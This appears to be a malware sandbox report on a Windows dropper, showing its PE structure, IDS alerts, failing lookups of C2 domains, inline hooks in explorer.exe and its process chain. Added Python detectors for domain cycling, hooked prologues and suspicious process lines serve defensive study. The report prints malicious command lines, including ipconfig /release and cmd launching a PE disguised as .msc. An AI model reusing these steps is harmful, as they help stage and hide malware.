IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3c000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4722c | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3a32c | 0x3a400 | e320764e1b3c816ba80aeb820cb8a274 | False | 0.581381605418455 | data | 6.685359764265178 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3c000 | 0xcbf8 | 0xcc00 | 47c3be3304bfdfb2a778f355849d1c3f | False | 0.4439529718137255 | data | 5.167069652624378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x49000 | 0xd7e0 | 0x1200 | 6335f9314c2900dccb530e151f1b1ee8 | False | 0.3956163194444444 | data | 4.0290550032041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x57000 | 0x1a8 | 0x200 | 232a8fe82993b55cefe09cffc39a79b0 | False | 0.462890625 | data | 3.5080985761326375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x58000 | 0x5134 | 0x5200 | bfa63777cb8495b69c7a6e54d8390262 | False | 0.612280868902439 | data | 6.3604830181772565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x5e000 | 0x2afc | 0x2c00 | 98fd4bc572f87a21f69dc57f720a6dbc | False | 0.75 | data | 6.617141671767599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x58554 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x5909c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x5a648 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.7624113475177305
RT_DIALOG | 0x5aab0 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x5ad38 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x5ae74 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x5af60 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x5b090 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x5b3c8 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x5b61c | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x5b800 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x5b9cc | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x5bb84 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x5bccc | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x5c138 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x5c2a0 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x5c3f4 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x5c500 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x5c5bc | 0x1c0 | data | English | United States | 0.5178571428571429
RT_STRING | 0x5c77c | 0x250 | data | English | United States | 0.44256756756756754
RT_GROUP_ICON | 0x5c9cc | 0x14 | data | | | 1.1
RT_MANIFEST | 0x5c9e0 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T15:57:23.745966+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-05T15:57:45.888405+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.8 | 58145 | TCP
2024-11-05T15:57:47.301900+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.8 | 58146 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 15:57:25.262123108 CET | 53 | 53435 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 15:57:39.935204983 CET | 53 | 60125 | 162.159.36.2 | 192.168.2.8
Nov 5, 2024 15:57:40.559967041 CET | 52328 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 15:57:40.566946030 CET | 53 | 52328 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 15:57:42.355735064 CET | 52072 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 15:57:42.369263887 CET | 53 | 52072 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 15:58:02.924220085 CET | 64621 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 15:58:02.947779894 CET | 53 | 64621 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 15:58:22.693392038 CET | 56291 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 15:58:22.716519117 CET | 53 | 56291 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 15:58:43.271280050 CET | 55127 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 15:58:43.585354090 CET | 53 | 55127 | 1.1.1.1 | 192.168.2.8
Nov 5, 2024 15:59:03.569488049 CET | 50398 | 53 | 192.168.2.8 | 1.1.1.1
Nov 5, 2024 15:59:03.591702938 CET | 53 | 50398 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 5, 2024 15:57:40.559967041 CET | 192.168.2.8 | 1.1.1.1 | 0x14d0 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Nov 5, 2024 15:57:42.355735064 CET | 192.168.2.8 | 1.1.1.1 | 0xf41e | Standard query (0) | 212.20.149.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Nov 5, 2024 15:58:02.924220085 CET | 192.168.2.8 | 1.1.1.1 | 0xe347 | Standard query (0) | www.arehouse-inventory-62571.bond | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:58:22.693392038 CET | 192.168.2.8 | 1.1.1.1 | 0xa32b | Standard query (0) | www.lladinco.online | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:58:43.271280050 CET | 192.168.2.8 | 1.1.1.1 | 0x4d26 | Standard query (0) | www.inlinlong.top | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:59:03.569488049 CET | 192.168.2.8 | 1.1.1.1 | 0xe0b0 | Standard query (0) | www.reon-network.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 15:57:40.566946030 CET | 1.1.1.1 | 192.168.2.8 | 0x14d0 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 5, 2024 15:57:42.369263887 CET | 1.1.1.1 | 192.168.2.8 | 0xf41e | Name error (3) | 212.20.149.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 5, 2024 15:58:02.947779894 CET | 1.1.1.1 | 192.168.2.8 | 0xe347 | Name error (3) | www.arehouse-inventory-62571.bond | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:58:22.716519117 CET | 1.1.1.1 | 192.168.2.8 | 0xa32b | Name error (3) | www.lladinco.online | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:58:43.585354090 CET | 1.1.1.1 | 192.168.2.8 | 0x4d26 | Name error (3) | www.inlinlong.top | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:59:03.591702938 CET | 1.1.1.1 | 192.168.2.8 | 0xe0b0 | Name error (3) | www.reon-network.xyz | none | none | A (IP address) | IN (0x0001) | false
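
The DNS tables above show the on-the-wire shape of a loader walking a list of candidate C2 domains: after two reverse lookups, the sample queries four unrelated "www." names on four different TLDs, one every roughly 20 seconds, and every one of them comes back "Name error (3)" (NXDOMAIN). The following detector is an added example written for this page, not part of the Joe Sandbox report or of any vendor rule set; the pipe-delimited log format and the thresholds (three or more distinct failing names, at most 60 s apart, with no gap deviating more than 50% from the mean) are assumptions chosen for illustration, and the sample lines are the report's own DNS rows re-keyed into that format with timestamps truncated to microseconds.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: the DNS query/answer rows of this report, re-keyed into a
# simple pipe-delimited format (an assumption for this example, not Joe Sandbox's
# export format). Status is "query" for a request and the reply code for a response.
SAMPLE_LOG = """\
2024-11-05 15:57:40.559967 | 192.168.2.8 | 0x14d0 | 18.31.95.13.in-addr.arpa | PTR | query
2024-11-05 15:57:40.566946 | 192.168.2.8 | 0x14d0 | 18.31.95.13.in-addr.arpa | PTR | NXDOMAIN
2024-11-05 15:57:42.355735 | 192.168.2.8 | 0xf41e | 212.20.149.52.in-addr.arpa | PTR | query
2024-11-05 15:57:42.369263 | 192.168.2.8 | 0xf41e | 212.20.149.52.in-addr.arpa | PTR | NXDOMAIN
2024-11-05 15:58:02.924220 | 192.168.2.8 | 0xe347 | www.arehouse-inventory-62571.bond | A | query
2024-11-05 15:58:02.947779 | 192.168.2.8 | 0xe347 | www.arehouse-inventory-62571.bond | A | NXDOMAIN
2024-11-05 15:58:22.693392 | 192.168.2.8 | 0xa32b | www.lladinco.online | A | query
2024-11-05 15:58:22.716519 | 192.168.2.8 | 0xa32b | www.lladinco.online | A | NXDOMAIN
2024-11-05 15:58:43.271280 | 192.168.2.8 | 0x4d26 | www.inlinlong.top | A | query
2024-11-05 15:58:43.585354 | 192.168.2.8 | 0x4d26 | www.inlinlong.top | A | NXDOMAIN
2024-11-05 15:59:03.569488 | 192.168.2.8 | 0xe0b0 | www.reon-network.xyz | A | query
2024-11-05 15:59:03.591702 | 192.168.2.8 | 0xe0b0 | www.reon-network.xyz | A | NXDOMAIN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) \| (?P<client>[\d.]+) \| "
    r"(?P<txid>0x[0-9a-fA-F]+) \| (?P<name>\S+) \| (?P<qtype>[A-Z]+) \| (?P<status>\w+)$"
)


def parse_log(text):
    """Parse the sample format into dict records, sorted by timestamp."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # tolerate blank or malformed lines instead of aborting
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S.%f")
        records.append(rec)
    records.sort(key=lambda r: r["ts"])
    return records


def _alert_for_run(client, run, max_gap, max_jitter):
    """Turn a run of failing A queries into an alert if the spacing is regular."""
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(run, run[1:])]
    if not gaps:
        return None
    mean = sum(gaps) / len(gaps)
    if mean > max_gap or any(abs(g - mean) > max_jitter * mean for g in gaps):
        return None
    return {"client": client, "domains": [name for _, name in run], "mean_interval": mean}


def find_domain_cycling(records, min_domains=3, max_gap=60.0, max_jitter=0.5):
    """Flag a client that queries >= min_domains distinct A-record names in a row,
    every one answered NXDOMAIN, at a roughly fixed interval. PTR lookups are
    ignored; a resolved name or a repeated name ends the current run."""
    outcome = {}  # (client, txid) -> reply code
    for r in records:
        if r["status"] != "query":
            outcome[(r["client"], r["txid"])] = r["status"]

    per_client = defaultdict(list)  # client -> [(ts, name, reply)] for A queries
    for r in records:
        if r["status"] == "query" and r["qtype"] == "A":
            reply = outcome.get((r["client"], r["txid"]), "NORESPONSE")
            per_client[r["client"]].append((r["ts"], r["name"], reply))

    alerts = []
    for client, queries in per_client.items():
        run = []  # consecutive NXDOMAIN queries to distinct names
        for ts, name, reply in queries + [(None, None, "END")]:  # sentinel flushes the last run
            if reply == "NXDOMAIN" and name not in {n for _, n in run}:
                run.append((ts, name))
                continue
            if len(run) >= min_domains:
                alert = _alert_for_run(client, run, max_gap, max_jitter)
                if alert:
                    alerts.append(alert)
            run = [(ts, name)] if reply == "NXDOMAIN" else []
    return alerts


if __name__ == "__main__":
    for a in find_domain_cycling(parse_log(SAMPLE_LOG)):
        print(f"{a['client']}: {len(a['domains'])} failing lookups every "
              f"~{a['mean_interval']:.0f}s -> {', '.join(a['domains'])}")
```

On the sample this yields one alert for 192.168.2.8 covering all four names at a mean spacing of about 20 s. The regularity test is what separates this from an ordinary burst of typo or stale-bookmark NXDOMAINs; on real resolver logs it should be paired with a per-client baseline, since a single misconfigured application can also produce periodic failing lookups.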

                                                                                                                                                    Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE3
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE3
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE3
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE3
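
The two tables above record INLINE hooks on four user32.dll message-pump exports inside explorer.exe, with the first bytes of each function overwritten ("New Data"). The standard check for this class of hook is to compare the prologue of every export as mapped in the process with the prologue of the same export in the clean module on disk, and then to classify any difference by trampoline shape so an analyst can see where control is redirected. The block below is an added example written for this page, not code from Joe Sandbox or from any hooking framework; it runs offline on constructed bytes. CLEAN_PROLOGUE is a generic MSVC x64 prologue and is not the real first bytes of PeekMessageA, the module base and export addresses are invented, and the only bytes taken from the report are the six "New Data" bytes shown for PeekMessageA, which the classifier reports as a modification it cannot decode.

```python
import struct

# Constructed data for this example. CLEAN_PROLOGUE is a generic MSVC x64 prologue
# (mov [rsp+8],rbx; mov [rsp+10h],rsi; push rdi; sub rsp,20h), NOT the real bytes
# of user32!PeekMessageA. BASE and the export addresses are invented.
CLEAN_PROLOGUE = bytes.fromhex("48895C24084889742410574883EC20")
BASE = 0x00007FFB2A3C0000
SAMPLE_ADDRESSES = {
    "GetMessageA": BASE + 0x1000,
    "GetMessageW": BASE + 0x1100,
    "PeekMessageA": BASE + 0x1200,
    "PeekMessageW": BASE + 0x1300,
}
HOOK_TARGET = BASE + 0x80000  # where the constructed trampolines land


def decode_stub(data, address=0):
    """Recognise trampoline shapes commonly written by x64 inline hooks at data[0].
    `address` is the virtual address of data[0], needed for RIP-relative forms.
    Returns (kind, target) or (None, None)."""
    if len(data) >= 5 and data[0] == 0xE9:                        # jmp rel32
        return "jmp_rel32", address + 5 + struct.unpack_from("<i", data, 1)[0]
    if len(data) >= 6 and data[:2] == b"\xFF\x25":                # jmp [rip+disp32]
        slot = address + 6 + struct.unpack_from("<i", data, 2)[0]
        return "jmp_rip_indirect", slot                            # the pointer slot, not the final target
    if len(data) >= 12 and data[:2] == b"\x48\xB8" and data[10:12] == b"\xFF\xE0":
        return "mov_rax_jmp_rax", struct.unpack_from("<Q", data, 2)[0]  # mov rax,imm64; jmp rax
    if (len(data) >= 14 and data[0] == 0x68 and data[5:9] == b"\xC7\x44\x24\x04"
            and data[13] == 0xC3):                                 # push lo; mov [rsp+4],hi; ret
        lo = struct.unpack_from("<I", data, 1)[0]
        hi = struct.unpack_from("<I", data, 9)[0]
        return "push_ret", (hi << 32) | lo
    return None, None


def check_export(name, clean, observed, address=0, prologue_len=16):
    """Diff the first prologue_len bytes of an export as found on disk (clean)
    against what the process has mapped (observed)."""
    clean, observed = clean[:prologue_len], observed[:prologue_len]
    if clean == observed:
        return {"function": name, "hooked": False}
    kind, target = decode_stub(observed, address)
    return {
        "function": name,
        "hooked": True,
        "stub": kind or "unrecognised",
        "target": target,
        "new_data": " ".join(f"0x{b:02X}" for b in observed[:6]),
    }


def hook_report(exports, address_of):
    """exports: {name: (clean_bytes, observed_bytes)}; address_of: {name: virtual address}."""
    return [check_export(n, c, o, address_of.get(n, 0)) for n, (c, o) in exports.items()]


def _jmp_rel32(target, at):
    return b"\xE9" + struct.pack("<i", target - (at + 5))


def _mov_rax_jmp(target):
    return b"\x48\xB8" + struct.pack("<Q", target) + b"\xFF\xE0"


# Constructed observations: one untouched export, two textbook trampolines, and
# the six "New Data" bytes the report lists for PeekMessageA in front of the clean tail.
SAMPLE_EXPORTS = {
    "GetMessageA": (CLEAN_PROLOGUE, CLEAN_PROLOGUE),
    "GetMessageW": (CLEAN_PROLOGUE, _jmp_rel32(HOOK_TARGET, SAMPLE_ADDRESSES["GetMessageW"]) + CLEAN_PROLOGUE[5:]),
    "PeekMessageW": (CLEAN_PROLOGUE, _mov_rax_jmp(HOOK_TARGET) + CLEAN_PROLOGUE[12:]),
    "PeekMessageA": (CLEAN_PROLOGUE, bytes.fromhex("488BB8877EE3") + CLEAN_PROLOGUE[6:]),
}

if __name__ == "__main__":
    for r in hook_report(SAMPLE_EXPORTS, SAMPLE_ADDRESSES):
        print(r)
```

On a live system the clean side comes from mapping the module file from disk and applying its relocations before the comparison; x64 export prologues are almost always position independent, so a difference in the first bytes is a strong signal, but the target address still needs triage. Resolve it to the owning module: a target inside an EDR or accessibility DLL is expected, a target in an unbacked private region of explorer.exe, as with an injected payload, is not.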


                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:09:57:04
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\M1Y6kc9FpE.exe"
                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                    File size:1'050'479 bytes
                                                                                                                                                    MD5 hash:7D8165E194302250D880425B1608E307
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:09:57:08
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe"
                                                                                                                                                    Imagebase:0xed0000
                                                                                                                                                    File size:147'456 bytes
                                                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:09:57:18
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:09:57:18
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:09:57:18
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docx
                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:09:57:19
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:7
                                                                                                                                                    Start time:09:57:19
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ipconfig /release
                                                                                                                                                    Imagebase:0xa70000
                                                                                                                                                    File size:29'184 bytes
                                                                                                                                                    MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true
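
The process list in this report reads as a chain: a self-extracting archive drops into Temp\RarSFX0, wscript.exe runs a .vbe from there, cmd.exe releases the DHCP lease with ipconfig, and a PE named oxhvi.msc is launched with a .docx argument. Each of those steps is individually detectable from the process image and command line alone. The block below is an added example for this page, not Joe Sandbox's or any Sigma rule's logic; the five heuristics and their names are assumptions chosen for illustration, and the sample input is five entries from this report's process list trimmed to their Target ID, Path and Commandline lines, kept in the page's own "Key:Value" layout so the parser works on it directly.

```python
import re
from pathlib import PureWindowsPath

# Constructed input: five entries from this report's process list, trimmed to
# three keys each and kept in the page's "Key:Value" layout.
SAMPLE_PROCESSES = r"""
Target ID:0
Path:C:\Users\user\Desktop\M1Y6kc9FpE.exe
Commandline:"C:\Users\user\Desktop\M1Y6kc9FpE.exe"

Target ID:2
Path:C:\Windows\SysWOW64\wscript.exe
Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe"

Target ID:5
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:"C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docx

Target ID:7
Path:C:\Windows\SysWOW64\ipconfig.exe
Commandline:ipconfig /release

Target ID:8
Path:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
Commandline:oxhvi.msc bvqmcwxut.docx
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif"}  # assumption: what a process image should end in
TEMP_PATH_RE = re.compile(r"\\(?:appdata\\local\\temp|temp|tmp)\\", re.IGNORECASE)
SFX_DIR_RE = re.compile(r"\\RarSFX\d+\\", re.IGNORECASE)  # WinRAR SFX staging directory
CMD_C_RE = re.compile(r"(?:^|\s)/c\s+\"?([^\s\"]+)", re.IGNORECASE)  # first token after cmd /c


def parse_process_blocks(text):
    """Parse blank-line-separated 'Key:Value' blocks into dicts (first colon splits)."""
    processes, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                processes.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        processes.append(current)
    return processes


def evaluate(proc):
    """Return the names of the heuristics a single process entry triggers."""
    path = PureWindowsPath(proc.get("Path", ""))
    image = path.name.lower()
    cmdline = proc.get("Commandline", "")
    hits = []
    # 1. Script host reading its script out of a temp directory
    if image in SCRIPT_HOSTS and TEMP_PATH_RE.search(cmdline):
        hits.append("script_host_from_temp")
    # 2. Process image whose extension is not an executable one (PE masquerading as .msc etc.)
    if path.suffix and path.suffix.lower() not in EXECUTABLE_EXTS:
        hits.append("non_executable_image_extension")
    # 3. Process image launched from an SFX extraction directory
    if SFX_DIR_RE.search(str(path)):
        hits.append("sfx_extraction_dir")
    # 4. cmd.exe /c running a file whose extension is not executable
    if image == "cmd.exe":
        m = CMD_C_RE.search(cmdline)
        if m:
            suffix = PureWindowsPath(m.group(1)).suffix.lower()
            if suffix and suffix not in EXECUTABLE_EXTS:
                hits.append("cmd_runs_non_executable")
    # 5. DHCP lease dropped with ipconfig /release, which takes the host off the network
    if image == "ipconfig.exe" and re.search(r"/release\b", cmdline, re.IGNORECASE):
        hits.append("ipconfig_release")
    return hits


def triage(text):
    """Map Target ID -> triggered heuristics, omitting entries with no hits."""
    result = {}
    for proc in parse_process_blocks(text):
        hits = evaluate(proc)
        if hits:
            result[proc.get("Target ID", "?")] = hits
    return result


if __name__ == "__main__":
    for target, hits in triage(SAMPLE_PROCESSES).items():
        print(f"Target {target}: {', '.join(hits)}")
```

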